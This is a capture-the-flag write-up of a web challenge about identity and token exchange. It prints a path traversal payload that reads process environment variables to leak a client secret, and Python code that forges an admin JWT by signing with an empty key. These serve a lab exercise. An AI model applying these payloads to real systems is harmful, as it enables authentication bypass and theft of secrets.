[/MNT/AIN LIB] [WEB] centralized-identity

centralized-identity
SRC: https://library.m0unt41n.ch/challenges/centralized-identity

This challenge consists of multiple steps, our main goal is too obtain the flag via the backend service API.

1. Within our IDP entrypoint.sh we can find credentials to login into our frontend.

email: "[email protected]"
password: "password"

2. The page endpoint in the frontend service has a Path Traversal vulnerability, which we can use too dump the secret for our Token exchange.

@app.route("/page")
@auth.oidc_auth("default")
def page():
    page = request.args.get("page")
    if page is None:
        return "Not found", 404
    try:
        with open(f"templates/{page}", "r") as f:
            return f.read()
    except Exception as e:
        print(e)
        return "Not found", 404

/page?page=../../../../proc/self/environ gives us CLIENT_SECRET=ZMyjEAypRBXCTQMIiqTbT8M8GXiGrSd

3. The next vulnerability lies within how JWT tokens are handled. This allows us too basically define the key used for signing or just pass no key at all.

def get_value(dict, key):
    return dict.get(key) or ""

So we can forge an admin JWT.

import jwt
header = {
    "alg": "HS256",
    "kid": "frontend",
}
payload = {
    "name": "admin",
    "aud": "frontend",
}
subject_token = jwt.encode(payload, key="", headers=header)

4. Now we use our forged JWT and our client secret too request an access token and request the flag endpoint.

Puff piff paff multi step hack of doom.